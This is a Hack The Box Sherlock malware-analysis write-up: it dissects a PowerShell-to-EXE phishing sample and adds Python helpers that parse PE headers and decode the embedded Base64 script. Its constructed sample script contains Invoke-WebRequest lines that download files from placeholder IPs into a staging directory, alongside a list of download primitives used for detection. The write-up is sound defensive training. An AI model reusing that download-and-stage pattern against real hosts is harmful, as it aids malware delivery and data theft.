Hack The Box - Sherlock Challenge: HeartBreaker-Continuum
Objective:
Your task is to analyze a potentially malicious executable file submitted by a client. The file originated from a phishing email, and you need to determine its functionality and whether it facilitated data exfiltration.
---
Step 1: Get the SHA256 Hash of the Binary
To identify the suspicious binary, start by obtaining its SHA256 hash. For practical purposes the hash is a unique fingerprint of the file, which you can look up in external services such as VirusTotal.
Tools: PEStudio, VirusTotal, `sha256sum` on Linux/macOS, or `Get-FileHash` in PowerShell.
- I used PEStudio because it provides extensive details about the binary, including its hashes, metadata, and other properties.
Once you open the binary in PEStudio, the hash is displayed in the file hashes section of the overview.
- Search VirusTotal by hash rather than uploading the file: a client's sample may carry internal data, and uploading it makes it available to every VirusTotal subscriber.
---
Step 2: Find the Binary's Creation Date (UTC)
The "creation date" of a PE file is the TimeDateStamp the linker writes into the COFF file header. It is stored as seconds since the Unix epoch, so it carries no timezone, and PEStudio renders it as a UTC date.
- Look for the timestamp field in PEStudio's file-header section (it may be labelled as a compiler or linker stamp rather than "Creation Date").
- Treat the value as a hint, not a fact: it is set by the build tool and is trivial to forge, and deterministic .NET builds store a content hash in this field instead of a time.
---
Step 3: Find the Code Size of the Binary
The code size is the SizeOfCode field of the optional header: the total size of the executable-code sections (normally .text), rounded up to the file alignment. Comparing it with the overall file size is a useful sanity check; a small code section inside a large file means most of the file is data or resources, which is what you would expect from a script wrapped in a stub executable.
- In PEStudio, navigate to the Optional Header section.
- Read the SizeOfCode field, which gives the size of the executable's code in bytes.
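The three values Steps 1 to 3 read from PEStudio can be pulled straight out of the raw bytes, which is handy when you want to batch-triage samples or verify what the GUI shows. The following is an added example written for this writeup, not part of the challenge or of PEStudio; it uses only the Python standard library and builds a constructed header-only PE32 stub as offline sample input (the stub's timestamp and SizeOfCode are arbitrary values, and the stub is not the challenge binary).

```python
import hashlib
import struct
import sys
from datetime import datetime, timezone

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def pe_basics(data: bytes) -> dict:
    """Read the fields Steps 1-3 take from PEStudio directly out of the raw bytes:
    SHA256 of the whole file, the COFF TimeDateStamp (rendered as UTC) and SizeOfCode."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew at DOS-header offset 0x3C points to the "PE\0\0" signature.
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # COFF file header (20 bytes, little-endian): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
    machine, nsections, stamp, _, _, _, _ = struct.unpack_from("<HHIIIHH", data, coff)
    # The optional header follows immediately. Its first fields are identical for PE32 and
    # PE32+: Magic, MajorLinkerVersion, MinorLinkerVersion, SizeOfCode.
    magic, _, _, size_of_code = struct.unpack_from("<HBBI", data, coff + 20)
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "timestamp_raw": stamp,
        "compiled_utc": datetime.fromtimestamp(stamp, tz=timezone.utc),
        "size_of_code": size_of_code,
        "pe_format": {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic, hex(magic)),
        "sections": nsections,
        "machine": hex(machine),
    }


def build_sample_pe(stamp: int, size_of_code: int) -> bytes:
    """Constructed header-only PE32 stub used as offline sample input. It is not the
    challenge binary and would not run; it exists only to exercise pe_basics()."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # PE header immediately follows the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, stamp, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBI", PE32_MAGIC, 14, 0, size_of_code)
    opt += bytes(224 - len(opt))                   # pad to SizeOfOptionalHeader
    return bytes(dos) + b"PE\0\0" + coff + opt


if __name__ == "__main__":
    # Pass a path to analyse a real file; with no argument the constructed stub is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(1704067200, 0x1E00)
    for key, value in pe_basics(blob).items():
        print(f"{key:14} {value}")
```

The parser deliberately reads only the fixed-offset header fields, so it works for both PE32 and PE32+ images without a third-party PE library. Keep in mind that the timestamp it prints is whatever the build tool (or the attacker) chose to write there.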
---
Step 4: Determine the Original Filename
The binary appears to be a PowerShell script that was converted into an executable. Script-to-EXE converters generally keep the script inside the executable as an embedded resource, and often keep its original filename as well. To find it:
- In PEStudio, go to the Resources tab.
- Look for a .NET resource entry whose name points to the original file, which here is expected to be a PowerShell script name ending in .ps1.
---
Step 5: Identify the Obfuscated Code's Hexadecimal Offset
To find where the obfuscated code begins:
- In the Resources tab of PEStudio, look at the Location column for the resource found in Step 4.
- It gives the file offset (in hexadecimal) at which the obfuscated resource data starts; this is also where a hex editor or an extraction script should start reading when you carve the blob out.
---
Step 6: Identify the Encoding Method for Obfuscation
The threat actor encoded the script to hide it from casual inspection. Identify the encoding by:
- Checking the First Bytes of the resource in the Resources section of PEStudio.
- The bytes are printable characters drawn entirely from the Base64 alphabet (A-Z, a-z, 0-9, + and /, with = as padding) rather than a binary header, which tells you the blob is Base64 encoded. Base64 is encoding, not encryption: it hides nothing from anyone who decodes it, and further layers may sit underneath.
---
Step 7: Identify the Cmdlet Used to Initiate File Downloads
The binary contains an obfuscated PowerShell script. To identify which cmdlet initiates the file downloads:
- Review the strings in the binary. You will notice obfuscated PowerShell code that, once decoded, is a script named NewILY.ps1.
- The loader reverses the string and decodes it as UTF-8 before invoking it.
To deobfuscate the script safely, reproduce the decoding steps in a script of your own that prints the decoded output instead of executing it: keep the reversal and decoding, and replace the invocation (Invoke-Expression or its alias iex) with Write-Output, or decode offline with a standalone tool. Do this in an isolated analysis VM, never on the client's host.
- Once decoded, you will see the PowerShell code in readable form, including the download cmdlet and the URLs it fetches. Search the decoded text for the usual download primitives (Invoke-WebRequest, Invoke-RestMethod, Start-BitsTransfer, and the .NET System.Net.WebClient DownloadFile/DownloadString methods) and note which one this sample uses.
---
Step 8: Identify Indicators of Compromise (IoCs)
By examining the deobfuscated PowerShell script, you can find network-related Indicators of Compromise (IoCs) such as IP addresses and hostnames.
- Look through the decoded script for IP addresses, domain names, and URLs, including any in the exfiltration command near the end.
- Record the IP addresses in ascending numeric order (compare octet by octet, not as text, so that 9.x.x.x sorts before 10.x.x.x).
---
Step 9: Locate the Staging Directory for Harvested Files
The script creates a staging directory in which it collects harvested files before exfiltrating them. To find the directory path:
- In the deobfuscated PowerShell script, look for a destination variable that defines the path files are copied to, and for the command that creates that directory.
- The value of that variable is the staging directory; it is also a host-based IoC worth adding to the report.
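Steps 5 through 9 are one pipeline: carve the Base64 blob out of the resource, undo the layers without ever executing the result, then pull the download cmdlet, the network IoCs and the staging path out of the plain text. The block below is an added example written for this writeup, not the challenge's NewILY.ps1 or any code from the binary. It assumes the packing order UTF-8 bytes, then Base64, then string reversal (if the real sample layers them differently, swap the two lines in deobfuscate()), and its sample script, URLs and path are constructed documentation values that do not come from the challenge.

```python
import base64
import ipaddress
import re

# Constructed stand-in for the embedded script. It is NOT the challenge's NewILY.ps1;
# the addresses and path are example values invented for this demo.
SAMPLE_SCRIPT = (
    '$destination = "C:\\Users\\Public\\Libraries\\staging"\n'
    'New-Item -ItemType Directory -Force -Path $destination | Out-Null\n'
    'Invoke-WebRequest -Uri "http://203.0.113.10/tool.exe" -OutFile "$destination\\tool.exe"\n'
    'Invoke-WebRequest -Uri "http://198.51.100.5/list.txt" -OutFile "$destination\\list.txt"\n'
)


def obfuscate(script: str) -> str:
    """Assumed packing order: UTF-8 -> Base64 -> reversed string. Used only to build sample input."""
    return base64.b64encode(script.encode("utf-8")).decode("ascii")[::-1]


def deobfuscate(blob: str) -> str:
    """Undo the layers without executing anything (this is the 'print, don't invoke' step)."""
    return base64.b64decode(blob[::-1], validate=True).decode("utf-8")


def find_base64_runs(data: bytes, min_len: int = 64) -> list:
    """(offset, text) for every long run of Base64-alphabet bytes; the offset plays the
    role of the Location PEStudio shows for the resource (Step 5), and the alphabet
    check is the First Bytes heuristic of Step 6."""
    pattern = rb"[A-Za-z0-9+/=]{%d,}" % min_len
    return [(m.start(), m.group().decode("ascii")) for m in re.finditer(pattern, data)]


DOWNLOAD_PRIMITIVES = ("Invoke-WebRequest", "Invoke-RestMethod", "Start-BitsTransfer",
                       "DownloadFile", "DownloadString")


def download_cmdlets(script: str) -> list:
    """Which of the usual PowerShell/.NET download primitives the decoded script uses (Step 7)."""
    lower = script.lower()
    return [name for name in DOWNLOAD_PRIMITIVES if name.lower() in lower]


IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def network_iocs(script: str) -> list:
    """Unique IPv4 addresses sorted numerically, octet by octet, not as strings (Step 8)."""
    addrs = set()
    for text in IPV4.findall(script):
        try:
            addrs.add(ipaddress.IPv4Address(text))
        except ipaddress.AddressValueError:
            pass  # regex-shaped but invalid, e.g. 256.1.1.1
    return [str(a) for a in sorted(addrs)]


def staging_directory(script: str):
    """Path assigned to a $dest... variable, i.e. the staging location of Step 9."""
    m = re.search(r'\$dest\w*\s*=\s*["\']([^"\']+)["\']', script)
    return m.group(1) if m else None


def analyse(resource_bytes: bytes) -> dict:
    """Run the whole pipeline over the raw bytes of the carved resource."""
    offset, blob = find_base64_runs(resource_bytes)[0]
    script = deobfuscate(blob)
    return {"offset": hex(offset), "script": script, "cmdlets": download_cmdlets(script),
            "iocs": network_iocs(script), "staging_dir": staging_directory(script)}


# Constructed resource image: a few non-text bytes, then the packed script, then padding.
SAMPLE_RESOURCE = b"\x00\x01\x02\xff" * 4 + obfuscate(SAMPLE_SCRIPT).encode("ascii") + b"\x00\x00"

if __name__ == "__main__":
    import json
    print(json.dumps(analyse(SAMPLE_RESOURCE), indent=2))
```

On the real sample you would feed find_base64_runs() the bytes of the file (or of the resource carved at the Step 5 offset) instead of SAMPLE_RESOURCE. The decoded text is only ever returned and printed; nothing here calls PowerShell.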
---
Step 10: MITRE Technique for Automated Data Collection
The way the malware gathers files on its own, without operator interaction, maps to the MITRE ATT&CK framework as follows:
- The relevant technique is T1119 Automated Collection, under the Collection tactic.
---
Step 11: Password for Exfiltration
Finally, to find the password used to exfiltrate the collected files:
- Review the PowerShell script for references to a file transfer protocol (here SFTP) and to the client it drives.
- The credentials are embedded in the connection line, of the form `open sftp://…` in the script; in that `open sftp://user:password@host` scripting syntax (used by WinSCP-style clients) the password sits in clear text inside the URL.
- Record the credentials as IoCs for the report, but do not use them to log in to the attacker's server: that would be unauthorised access and would tip off the operator.
---
Conclusion:
By following these steps, you’ll analyze the binary, understand its functionality, and uncover any malicious activity it may have caused. This includes identifying the attack methodology, potential data exfiltration routes, and relevant network indicators. Provide a comprehensive report detailing your findings along with recommended mitigation steps.